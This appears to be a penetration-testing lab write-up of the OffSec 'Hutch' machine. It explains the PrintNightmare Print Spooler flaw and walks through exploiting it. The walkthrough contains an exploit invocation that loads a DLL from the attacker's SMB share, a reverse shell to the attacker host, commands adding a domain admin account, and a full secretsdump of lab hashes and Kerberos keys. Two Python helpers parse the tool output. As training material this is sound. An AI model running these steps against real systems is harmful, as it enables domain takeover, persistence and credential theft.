CVE-2021-34527


A vulnerability has been found in Microsoft Windows (Operating System) and classified as critical. It affects the function RpcAddPrinterDriverEx in spoolsv.exe, part of the Print Spooler Service. Manipulating the argument dwFileCopyFlags leads to an access control vulnerability, classified as CWE-284: the product does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. The impact covers confidentiality, integrity and availability.

CVE-2021-34527 is the remote variant of CVE-2021-1675. It is reached over MSRPC through either the MS-RPRN or the MS-PAR interface of the Print Spooler.

The MS-RPRN path abuses a logic flaw in RpcAddPrinterDriverEx: when the caller sets APD_INSTALL_WARNED_DRIVER (0x8000) in dwFileCopyFlags, the spooler skips its SeLoadDriverPrivilege check, copies the driver files from the caller-supplied UNC path and loads the DLL inside spoolsv.exe, which runs as SYSTEM.

There is a second path through the MS-PAR protocol's RpcAsyncAddPrinterDriver function. It is similar to RpcAddPrinterDriverEx but has far fewer constraints, and it is not limited to domain controllers or to Windows 10 systems with non-default settings.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch/CVE-2021-34527_v2]
└─$ impacket-rpcdump $IP | grep -iE 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol 
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 

Both printing interfaces were enumerated earlier from the target's RPC endpoint mapper with impacket-rpcdump; their presence confirms the Print Spooler is running and reachable
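Parsing the full rpcdump output instead of grepping it also yields the binding strings, which is the transport the exploit connects to later. The script below is an added example, not part of the original write-up and not impacket code; the rpcdump text embedded in it is constructed to mirror the tool's layout (the two print interface UUIDs are the real ones, host and ports are illustrative), and the file name spooler_triage.py is an assumption.

```python
"""Triage impacket-rpcdump output for Print Spooler exposure.

Added example; not part of the original write-up and not impacket code. It
parses the text impacket-rpcdump prints and reports the MS-RPRN / MS-PAR
endpoints with their bindings. SAMPLE_RPCDUMP is constructed to match
rpcdump's layout; the two print interface UUIDs are real, host/ports are not.
"""
import re
import sys
from dataclasses import dataclass, field

# Interface UUIDs registered by spoolsv.exe
PRINT_INTERFACES = {
    "12345678-1234-ABCD-EF00-0123456789AB": "MS-RPRN",  # Print System Remote Protocol
    "76F03F96-CDFD-44FC-A22C-64950A001209": "MS-PAR",   # Print System Asynchronous Remote Protocol
}

UUID_RE = re.compile(r"([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\s+v([\d.]+)")


@dataclass
class Endpoint:
    protocol: str
    provider: str = ""
    uuid: str = ""
    version: str = ""
    bindings: list = field(default_factory=list)


def parse_rpcdump(text):
    """Parse rpcdump's Protocol/Provider/UUID/Bindings blocks into Endpoint records."""
    endpoints, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Protocol:"):
            current = Endpoint(protocol=line.split(":", 1)[1].strip())
            endpoints.append(current)
        elif current is None or not line or line.startswith(("Bindings:", "[*]", "[-]")):
            continue
        elif line.startswith("Provider:"):
            current.provider = line.split(":", 1)[1].strip()
        elif line.startswith("UUID"):
            m = UUID_RE.search(line)
            if m:
                current.uuid, current.version = m.group(1).upper(), m.group(2)
        else:
            # any other indented line under a block is a binding string,
            # e.g. ncacn_np:\\HUTCHDC[\pipe\spoolss]
            current.bindings.append(line)
    return endpoints


def spooler_exposure(endpoints):
    """Map 'MS-RPRN' / 'MS-PAR' to their binding strings for the interfaces that are registered."""
    found = {}
    for ep in endpoints:
        name = PRINT_INTERFACES.get(ep.uuid)
        if name:
            found.setdefault(name, []).extend(ep.bindings)
    return found


def reachable_over_spoolss_pipe(bindings):
    """True if one binding is the \\pipe\\spoolss named pipe, the transport the PoC above binds to."""
    return any(b.lower().startswith("ncacn_np:") and "[\\pipe\\spoolss]" in b.lower() for b in bindings)


# Constructed sample in rpcdump's format: one unrelated endpoint, then the two print interfaces
SAMPLE_RPCDUMP = r"""
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Retrieving endpoint list from 192.168.187.122
Protocol: N/A
Provider: N/A
UUID    : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service
Bindings:
          ncacn_ip_tcp:192.168.187.122[49664]
          ncacn_np:\\HUTCHDC[\pipe\lsass]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:192.168.187.122[49676]
          ncacn_np:\\HUTCHDC[\pipe\spoolss]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
          ncacn_ip_tcp:192.168.187.122[49676]
          ncacn_np:\\HUTCHDC[\pipe\spoolss]

[*] Received 3 endpoints.
"""

if __name__ == "__main__":
    # usage: impacket-rpcdump $IP | python3 spooler_triage.py   (falls back to the sample)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RPCDUMP
    for name, bindings in spooler_exposure(parse_rpcdump(text)).items():
        pipe = "yes" if reachable_over_spoolss_pipe(bindings) else "no"
        print(f"{name}: {len(bindings)} binding(s), \\pipe\\spoolss reachable: {pipe}")
```

A host that registers the interfaces but only over ncacn_ip_tcp would still be a candidate, but the PoC used later binds to the spoolss named pipe over SMB, so that is the binding worth checking first.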

Exploit


The PoC used here, CVE-2021-34527_v2.py, includes a built-in SMB server that hosts the DLL payload, so no separate share has to be started on the attacking machine

Exploitation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch/CVE-2021-34527_v2]
└─$ python3 CVE-2021-34527_v2.py $IP -u fmcsorley -p CrabSharkJellyfish192 -d HUTCH.OFFSEC -proto MS-RPRN -dll printnightmare.dll --local-ip $tun0 -share smb
 
[*] starting PrintNightmare PoC
[+] Self-hosted payload at \\192.168.45.204\smb\printnightmare.dll
 
[*] Attempting target: 192.168.187.122
[*] Connecting to ncacn_np:192.168.187.122[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.45.204\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[-] Exploit returned: SMB SessionError: code: 0xc00000b1 - STATUS_PIPE_CLOSING - The specified named pipe is in the closing state.
[*] Closing SMB Server

Running the exploit with fmcsorley's domain credentials over MS-RPRN. The STATUS_PIPE_CLOSING error on the second attempt can be ignored: the reverse shell that comes back shows the first attempt had already loaded the DLL into the spooler

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch/CVE-2021-34527_v2]
└─$ nnc 1234                                                                   
listening on [any] 1234 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.187.122] 50915
Windows PowerShell running as user HUTCHDC$ on HUTCHDC
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
hutchdc
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::9df9:8e58:4400:9b3a%3
   IPv4 Address. . . . . . . . . . . : 192.168.187.122
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.187.254

SYSTEM-level compromise of the domain controller HUTCHDC

Hashdump


C:\Windows\system32> net user /ADD adm1n Qwer1234 /DOMAIN && net groups "Domain Admins" /DOMAIN /ADD adm1n
The command completed successfully.
The command completed successfully.

Creating a new domain admin account from the SYSTEM shell so the domain can be dumped remotely. This is a noisy, persistent change (Event IDs 4720 and 4728 are logged on the DC) that should be recorded and removed at the end of the engagement; with SYSTEM on the DC already in hand, the same secrets could also be pulled without adding an account

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch/CVE-2021-34527_v2]
└─$ impacket-secretsdump HUTCH.OFFSEC/adm1n@hutchdc.hutch.offsec -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Target system bootKey: 0xb24173e6ac9aa789ab05a4acceeb27ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bab179eba40e413086aa37742476c646:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HUTCH\HUTCHDC$:aes256-cts-hmac-sha1-96:986a2ea7bd0c20e0d2c5b5102d524d518e570ccc276eb3127b405bdf85a1e0d1
HUTCH\HUTCHDC$:aes128-cts-hmac-sha1-96:b32fce77ee3988aa0bef4b9bb89e5814
HUTCH\HUTCHDC$:des-cbc-md5:454f1ce651d3d523
HUTCH\HUTCHDC$:plain_password_hex:1b393595f43baefa886001e32894303c75f75006ab84ef233e025106c7d57dc9e0c24ab1c808d3a535cb2d2ed2ee4b0b2b61ec203447cecda73bb2bd5411b223fc2df36753a6297fd07d1c2635bffc662a986e1f7fae74d9644b5c91b85da5762ecb1e5428deda72cea479f3e9d52c3d2fe0071132067b65f3010c998f7495063888c8537d6bd689f7060bb6bf332f34ddd8cf50baad25f1187b89b31b9d4f9fea22e2de873c8dffdc9848b82249dfd15f5b5504b2ed26b8c1d3dfd8893c89548aa2c432aa353d8858306c7c9fc48f357c6c0f13c6f48eca60f72281970a5047b839767c59d0814ba88c659821cc275c
HUTCH\HUTCHDC$:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb818f6846ad0c5c47237a32eee5c2c30b0f739c0
dpapi_userkey:0x9c047d0b5fde15f60714f1411579b93a45dd5872
[*] NL$KM 
 0000   41 34 3F B6 A2 15 2F 99  E2 AA 6C 70 8C 5D 08 DA   A4?.../...lp.]..
 0010   C8 D0 7D ED 67 E9 35 73  A0 31 42 22 C5 A3 4C F2   ..}.g.5s.1B"..L.
 0020   CD C3 EE 84 3E 86 26 A0  EC 91 48 AB A1 62 85 19   ....>.&...H..b..
 0030   4F 37 C8 BC 78 4C 6A 54  36 63 95 0E 82 A0 72 57   O7..xLjT6c....rW
NL$KM:41343fb6a2152f99e2aa6c708c5d08dac8d07ded67e93573a0314222c5a34cf2cdc3ee843e8626a0ec9148aba16285194f37c8bc784c6a543663950e82a07257
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3247226bb126aed3663c935f2ab37c1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3c37d961d2fbbc1eb9e4d09f145ad361:::
hutch.offsec\rplacidi:1103:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\opatry:1104:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\ltaunton:1105:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\acostello:1106:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jsparwell:1107:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\oknee:1108:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jmckendry:1109:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\avictoria:1110:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jfrarey:1111:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\eaburrow:1112:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\cluddy:1113:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\agitthouse:1114:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\fmcsorley:1115:aad3b435b51404eeaad3b435b51404ee:83bcf188adc71adef071303fae29c1c7:::
hutch.offsec\domainadmin:1116:aad3b435b51404eeaad3b435b51404ee:8730fa0d1014eb78c61e3957aa7b93d7:::
adm1n:4102:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
HUTCHDC$:1000:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c091e4980477f3f9c4c2e3ad64a08d107c42158956a6301e7d037a66b9637e88
Administrator:aes128-cts-hmac-sha1-96:0152f1d86193a32f6bac28bf653d2e22
Administrator:des-cbc-md5:794054f2da5d34fd
krbtgt:aes256-cts-hmac-sha1-96:dc0de1944fc0218c5129c7b945f294be4940d5c4da9e632bc1c21c38a97974db
krbtgt:aes128-cts-hmac-sha1-96:927cd0e8ad96f8acfe8a76c15e2580d0
krbtgt:des-cbc-md5:023854fd2fd902dc
hutch.offsec\rplacidi:aes256-cts-hmac-sha1-96:7b5d40ea6108d29863a8079220b7b5142803a9c85d8c40ce65a73eed4fc71ab9
hutch.offsec\rplacidi:aes128-cts-hmac-sha1-96:ed21b067b78145b37eff06d98a4828ff
hutch.offsec\rplacidi:des-cbc-md5:980189853220f8a2
hutch.offsec\opatry:aes256-cts-hmac-sha1-96:f87867606af1558ed27996123d2d6393f0330626befe65647e8c179471f0c534
hutch.offsec\opatry:aes128-cts-hmac-sha1-96:c41a8a599028f21664c2bae013b29ecb
hutch.offsec\opatry:des-cbc-md5:f7e51cf1f29145ce
hutch.offsec\ltaunton:aes256-cts-hmac-sha1-96:b5cd286fd8c9666c1e3c4f712cdb1e26b5fd51ac2104dc760d8a7f34fb617e99
hutch.offsec\ltaunton:aes128-cts-hmac-sha1-96:1a43ab7395e1f22ccb879a16f3a1496a
hutch.offsec\ltaunton:des-cbc-md5:7cf1a70145b55d2a
hutch.offsec\acostello:aes256-cts-hmac-sha1-96:34a6712ba826709bfdf7a02e2481f06beff30b1b6f6951daed8f446ec34f8422
hutch.offsec\acostello:aes128-cts-hmac-sha1-96:be0dee1e08c5474b11855f7d06d3a278
hutch.offsec\acostello:des-cbc-md5:3df49e3ed0736bd3
hutch.offsec\jsparwell:aes256-cts-hmac-sha1-96:b4d7e452c10a4555a20fab086aaa36e0fa7cb8d5a8b23df97bddad63f96b6f1d
hutch.offsec\jsparwell:aes128-cts-hmac-sha1-96:f20475c4781be65c52870e18cb4b613c
hutch.offsec\jsparwell:des-cbc-md5:54982c2a51dcefe6
hutch.offsec\oknee:aes256-cts-hmac-sha1-96:6b9a4ba95463961e9d2dcb8b17da7aa350e4d482e33fc81cca053ca333824c47
hutch.offsec\oknee:aes128-cts-hmac-sha1-96:aefb6cafd75fcfaa2fd38a0e56c75eec
hutch.offsec\oknee:des-cbc-md5:ec7a25eae0e94f1c
hutch.offsec\jmckendry:aes256-cts-hmac-sha1-96:22ee68dab0d877d43ee2f138bebbf30707b1c42f79f3753c42d7839116bd8b30
hutch.offsec\jmckendry:aes128-cts-hmac-sha1-96:bef6b24600ce768f636f0a6937da0418
hutch.offsec\jmckendry:des-cbc-md5:58dc1a49f4a45ba4
hutch.offsec\avictoria:aes256-cts-hmac-sha1-96:44d8f8cbc4517741a4f96dabe7ca8ef63d4772a43d79b838e00db7d9cd9963b9
hutch.offsec\avictoria:aes128-cts-hmac-sha1-96:fecfaa6ee425efb4c0fd5c1ab92a444f
hutch.offsec\avictoria:des-cbc-md5:837f9461e5b0fb49
hutch.offsec\jfrarey:aes256-cts-hmac-sha1-96:d0c59d53e3b2fa543b8fa148d7f9f5a8e1c41b5380e23a117ecbbe8ab138f8e5
hutch.offsec\jfrarey:aes128-cts-hmac-sha1-96:7017ee9e695a4c82f2b890e16414abe0
hutch.offsec\jfrarey:des-cbc-md5:df161cf8fddac145
hutch.offsec\eaburrow:aes256-cts-hmac-sha1-96:7c20426d91c8cfa2c0f301bd09dc570c4b7d485c9143db3e7da15644295e327c
hutch.offsec\eaburrow:aes128-cts-hmac-sha1-96:08d33ff5aa4a66054fe4333180b886ba
hutch.offsec\eaburrow:des-cbc-md5:4ca20797cd94b5ad
hutch.offsec\cluddy:aes256-cts-hmac-sha1-96:9f8ccb9ba6b0c8aa8199e300122478d4526be75d67ecc96fdc5e4892f9fd9432
hutch.offsec\cluddy:aes128-cts-hmac-sha1-96:0813d6e021a6117cf35ee8a6c4bda70b
hutch.offsec\cluddy:des-cbc-md5:8a322f1ff404ad89
hutch.offsec\agitthouse:aes256-cts-hmac-sha1-96:ea5768347ddf42e949c4c61c821e1b01be47d4a53485b7a6d8fca9b708a6a5dc
hutch.offsec\agitthouse:aes128-cts-hmac-sha1-96:0887271ba1239c9755738a7ce13345ff
hutch.offsec\agitthouse:des-cbc-md5:3ba23b07ef6d3d7a
hutch.offsec\fmcsorley:aes256-cts-hmac-sha1-96:679828b1625b953fb96470e0712f3bfa7866ee99f260f289dff48a19cd80cc87
hutch.offsec\fmcsorley:aes128-cts-hmac-sha1-96:d12b8c1d7125196020760b917cc5d159
hutch.offsec\fmcsorley:des-cbc-md5:7a9b7cc4496104ab
hutch.offsec\domainadmin:aes256-cts-hmac-sha1-96:8d90904d735e652112c1947fdde2f0b1205d8df1944c286b1d24ec1187dae4aa
hutch.offsec\domainadmin:aes128-cts-hmac-sha1-96:29e412c68977461a3f4ead34c2886402
hutch.offsec\domainadmin:des-cbc-md5:bc10f7df49315dc7
adm1n:aes256-cts-hmac-sha1-96:38724cc8dd0ab4a55d4ca5eefd79766caa32daa0ae33742a642d52507b50228b
adm1n:aes128-cts-hmac-sha1-96:996b8376868045dc1ebe2228e083e703
adm1n:des-cbc-md5:d652929b5eea98f8
HUTCHDC$:aes256-cts-hmac-sha1-96:986a2ea7bd0c20e0d2c5b5102d524d518e570ccc276eb3127b405bdf85a1e0d1
HUTCHDC$:aes128-cts-hmac-sha1-96:b32fce77ee3988aa0bef4b9bb89e5814
HUTCHDC$:des-cbc-md5:7fdff12091618094
[*] Cleaning up... 

Domain-level compromise. Two details in the dump are worth noting: twelve domain users (rplacidi through agitthouse) share the NT hash c11f1141ab4c1e825a11f15836e6978f, so they share one password; and the local SAM Administrator hash (bab179...) differs from the domain Administrator hash (c3247226...), because on a domain controller the SAM Administrator is the DSRM account rather than the domain account
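A quick triage of a secretsdump for password reuse, empty passwords and the SAM-versus-NTDS Administrator difference, as an added example (not part of the original write-up and not impacket code). It runs over an excerpt of the dump above with the hash values as printed there; the function names are mine.

```python
"""Triage impacket-secretsdump output: password reuse, empty passwords, SAM vs NTDS.

Added example; not part of the original write-up and not impacket code. It reads
the uid:rid:lmhash:nthash lines secretsdump prints, remembers which section each
came from, and groups accounts by NT hash. SAMPLE_DUMP is an excerpt of the dump
above (values as printed there); the function names are mine.
"""
import re
from collections import defaultdict

EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored

# user:rid:lmhash:nthash:::  (user may carry a prefix such as hutch.offsec\name)
HASH_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# secretsdump section headers; None = hash-shaped lines here are not account rows
SECTION_MARKERS = {
    "[*] Dumping local SAM hashes": "SAM",
    "[*] Dumping LSA Secrets": None,
    "[*] Dumping Domain Credentials": "NTDS",
    "[*] Kerberos keys grabbed": None,
}


def parse_sections(text):
    """Return {'SAM': [(user, rid, lm, nt), ...], 'NTDS': [...]}."""
    sections, current = defaultdict(list), None
    for raw in text.splitlines():
        line = raw.strip()
        for marker, name in SECTION_MARKERS.items():
            if line.startswith(marker):
                current = name
        m = HASH_LINE.match(line)
        if m and current:
            sections[current].append(
                (m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return sections


def shared_passwords(rows, min_accounts=2):
    """NT hashes used by at least min_accounts accounts. The empty-password hash is
    skipped: disabled built-ins share it without sharing a real secret."""
    by_nt = defaultdict(list)
    for user, _rid, _lm, nt in rows:
        by_nt[nt].append(user)
    return {nt: users for nt, users in by_nt.items()
            if nt != EMPTY_NT_HASH and len(users) >= min_accounts}


def empty_password_accounts(rows):
    return [user for user, _rid, _lm, nt in rows if nt == EMPTY_NT_HASH]


def admin_hash_differs(sections):
    """On a DC the local SAM 'Administrator' is the DSRM account, not the domain
    Administrator; True when their NT hashes differ, as in the dump above."""
    def nt_of(rows):
        return {u.split("\\")[-1].lower(): nt for u, _r, _l, nt in rows}
    sam, ntds = nt_of(sections.get("SAM", [])), nt_of(sections.get("NTDS", []))
    return "administrator" in sam and sam["administrator"] != ntds.get("administrator")


# Excerpt of the secretsdump output above (section headers kept so parsing is exercised)
SAMPLE_DUMP = r"""
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bab179eba40e413086aa37742476c646:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping LSA Secrets
HUTCH\HUTCHDC$:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3247226bb126aed3663c935f2ab37c1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3c37d961d2fbbc1eb9e4d09f145ad361:::
hutch.offsec\rplacidi:1103:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\opatry:1104:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\ltaunton:1105:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\acostello:1106:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jsparwell:1107:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\oknee:1108:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jmckendry:1109:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\avictoria:1110:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jfrarey:1111:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\eaburrow:1112:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\cluddy:1113:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\agitthouse:1114:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\fmcsorley:1115:aad3b435b51404eeaad3b435b51404ee:83bcf188adc71adef071303fae29c1c7:::
hutch.offsec\domainadmin:1116:aad3b435b51404eeaad3b435b51404ee:8730fa0d1014eb78c61e3957aa7b93d7:::
adm1n:4102:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
HUTCHDC$:1000:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] Kerberos keys grabbed
"""

if __name__ == "__main__":
    secs = parse_sections(SAMPLE_DUMP)
    for nt, users in shared_passwords(secs["NTDS"]).items():
        print(f"{len(users)} accounts share NT hash {nt}: {', '.join(users)}")
    print("empty passwords (NTDS):", empty_password_accounts(secs["NTDS"]))
    print("SAM Administrator differs from domain Administrator:", admin_hash_differs(secs))
```

Point the same functions at a saved secretsdump file to get the reuse clusters for a real engagement; one cracked password from a twelve-account cluster like the one above is twelve accounts.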